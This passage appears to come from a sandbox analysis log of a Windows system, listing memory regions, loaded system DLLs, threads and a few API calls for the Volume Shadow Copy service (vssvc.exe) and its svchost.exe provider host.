end_va = 0x194fff monitored = 0 entry_point = 0x151064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1213 start_va = 0x150000 end_va = 0x194fff monitored = 0 entry_point = 0x151064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1214 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1215 start_va = 0x1e00000 end_va = 0x20cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1216 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1217 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1218 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1219 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 1220 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1221 start_va = 0x7fef4b00000 end_va = 0x7fef4b13fff monitored = 0 entry_point = 0x7fef4b0c210 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Thread: id = 22 os_tid = 0xfa0 Thread: id = 23 os_tid = 0xfa4 Thread: id = 24 os_tid = 0xfa8 Thread: id = 25 os_tid = 0xfac Thread: id = 26 os_tid = 0xfb0 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x3532b000" os_pid = "0xfb8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006cea7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1222 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1223 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1224 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1225 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1226 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1227 start_va = 0xc0000 end_va = 0xd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 1228 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1229 start_va = 0xf0000 end_va = 0xfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1230 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 1231 start_va = 0x110000 end_va = 0x117fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1232 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1233 start_va = 0x140000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1234 start_va = 0x1c0000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1235 start_va = 0x2b0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1236 start_va = 0x3b0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1237 start_va = 0x4e0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1238 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1239 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1240 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1241 start_va = 0x940000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1242 start_va = 0xa10000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1243 start_va = 0xaf0000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1244 start_va = 0xc60000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 1245 start_va = 0xce0000 end_va = 0xfaefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1246 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1247 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1248 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1249 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1250 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1251 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1252 start_va = 0xff820000 end_va = 0xff9aafff monitored = 0 entry_point = 0xff950804 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 1253 start_va = 0x7fef4b00000 end_va = 0x7fef4b13fff monitored = 0 entry_point = 0x7fef4b0c210 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1254 start_va = 0x7fef4b20000 end_va = 0x7fef4b33fff monitored = 0 entry_point = 0x7fef4b21324 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 1255 start_va = 0x7fef7560000 end_va = 0x7fef7568fff monitored = 0 entry_point = 0x7fef756325c region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1256 start_va = 0x7fef75e0000 end_va = 0x7fef75e9fff monitored = 0 entry_point = 0x7fef75e42bc region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1257 start_va = 0x7fef96a0000 end_va = 0x7fef96b8fff monitored = 0 entry_point = 0x7fef96a1104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1258 start_va = 0x7fef96c0000 end_va = 0x7fef970ffff monitored = 0 entry_point = 0x7fef96c1190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1259 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1260 start_va = 0x7fefa3a0000 end_va = 0x7fefa54ffff monitored = 0 entry_point = 0x7fefa3a1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1261 start_va = 0x7fefb2a0000 end_va = 0x7fefb306fff monitored = 0 entry_point = 0x7fefb2b6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1262 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1263 start_va = 0x7fefb980000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb9816b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1264 start_va = 0x7fefb9a0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x7fefb9a1050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1265 start_va = 0x7fefb9c0000 end_va = 0x7fefb9cbfff monitored = 0 entry_point = 0x7fefb9c18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1266 start_va = 0x7fefb9d0000 end_va = 0x7fefb9e5fff monitored = 0 entry_point = 0x7fefb9d11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1267 start_va = 0x7fefc130000 end_va = 0x7fefc25bfff monitored = 0 entry_point = 0x7fefc1394bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1268 start_va = 0x7fefc260000 end_va = 0x7fefc27cfff monitored = 0 entry_point = 0x7fefc261ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1269 start_va = 0x7fefc940000 end_va = 0x7fefc94bfff monitored = 0 entry_point = 0x7fefc941064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1270 start_va = 0x7fefcd70000 end_va = 0x7fefcdb6fff monitored = 0 entry_point = 0x7fefcd71064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1271 start_va = 0x7fefd070000 end_va = 0x7fefd087fff monitored = 0 entry_point = 0x7fefd073b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1272 start_va = 0x7fefd260000 end_va = 0x7fefd28efff monitored = 0 entry_point = 0x7fefd261064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1273 start_va = 0x7fefd310000 end_va = 0x7fefd323fff monitored = 0 entry_point = 0x7fefd314160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1274 start_va = 0x7fefd570000 end_va = 0x7fefd592fff monitored = 0 entry_point = 0x7fefd571198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1275 start_va = 0x7fefd670000 end_va = 0x7fefd67efff monitored = 0 entry_point = 0x7fefd671010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1276 start_va = 0x7fefd760000 end_va = 0x7fefd773fff monitored = 0 entry_point = 0x7fefd7610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1277 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1278 start_va = 0x7fefd980000 end_va = 0x7fefd999fff monitored = 0 entry_point = 0x7fefd981558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1279 start_va = 0x7fefd9a0000 end_va = 0x7fefd9d5fff monitored = 0 entry_point = 0x7fefd9a1474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1280 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1281 start_va = 0x7fefdc80000 end_va = 0x7fefde56fff monitored = 0 entry_point = 0x7fefdc81010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1282 start_va = 0x7fefdf90000 end_va = 0x7fefe066fff monitored = 0 entry_point = 0x7fefdf93274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1283 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1284 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1285 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1286 start_va = 0x7feff2d0000 end_va = 0x7feff340fff monitored = 0 entry_point = 0x7feff2e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1287 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1288 start_va = 0x7feff360000 end_va = 0x7feff3f8fff monitored = 0 entry_point = 0x7feff361c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1289 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1290 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1291 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1292 start_va = 0x7feff760000 end_va = 0x7feff962fff monitored = 0 entry_point = 0x7feff783330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1293 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1294 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1295 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1296 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1297 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1298 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1299 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1300 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1301 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1302 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1303 start_va = 0x7fef48c0000 end_va = 0x7fef4944fff monitored = 0 entry_point = 0x7fef48c2600 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 1304 start_va = 0x7fef7530000 end_va = 0x7fef753bfff monitored = 1 entry_point = 0x7fef7531070 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Region: id = 1305 start_va = 0xfc0000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1306 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Thread: id = 27 os_tid = 0xfd8 Thread: id = 28 os_tid = 0xfd4 Thread: id = 29 os_tid = 0xfcc Thread: id = 30 os_tid = 0xfc8 [0109.539] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xb6d950 | out: lpSystemTimeAsFileTime=0xb6d950*(dwLowDateTime=0x9324c440, dwHighDateTime=0x1d9897a)) [0109.539] GetCurrentProcessId () returned 0xfb8 [0109.539] GetCurrentThreadId () returned 0xfc8 [0109.539] GetTickCount () returned 0x2050670 [0109.539] QueryPerformanceCounter (in: lpPerformanceCount=0xb6d958 | out: lpPerformanceCount=0xb6d958*=3401169385840) returned 1 [0109.539] malloc (_Size=0x100) returned 0x588f10 Thread: id = 31 os_tid = 0xfc4 Thread: id = 32 os_tid = 0xfc0 Thread: id = 33 os_tid = 0xfbc Thread: id = 34 os_tid = 0xff0 Thread: id = 115 os_tid = 0xd70 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x33a30000" os_pid = "0xfdc" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0006d350" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1307 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1308 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1309 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1310 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1311 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1312 start_va = 0xc0000 end_va = 0xc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1313 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1314 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1315 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1316 start_va = 0x140000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1317 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1318 start_va = 0x2f0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1319 start_va = 0x3f0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1320 start_va = 0x4d0000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1321 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1322 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1323 start_va = 0x680000 end_va = 0x94efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1324 start_va = 0x950000 end_va = 0xad7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1325 start_va = 0xae0000 end_va = 0xc60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1326 start_va = 0xd80000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 1327 start_va = 0xf10000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1328 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1329 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1330 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1331 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1332 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1333 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1334 start_va = 0xff760000 end_va = 0xff76afff monitored = 0 entry_point = 0xff76246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1335 start_va = 0x7fef4830000 end_va = 0x7fef48b1fff monitored = 0 entry_point = 0x7fef488ee88 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 1336 start_va = 0x7fef4b00000 end_va = 0x7fef4b13fff monitored = 0 entry_point = 0x7fef4b0c210 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1337 start_va = 0x7fef7560000 end_va = 0x7fef7568fff monitored = 0 entry_point = 0x7fef756325c region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 1338 start_va = 0x7fef75e0000 end_va = 0x7fef75e9fff monitored = 0 entry_point = 0x7fef75e42bc region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 1339 start_va = 0x7fefa380000 end_va = 0x7fefa396fff monitored = 0 entry_point = 0x7fefa381060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1340 start_va = 0x7fefb350000 end_va = 0x7fefb368fff monitored = 0 entry_point = 0x7fefb3511a8 region_type = mapped_file name = "atl.dll" 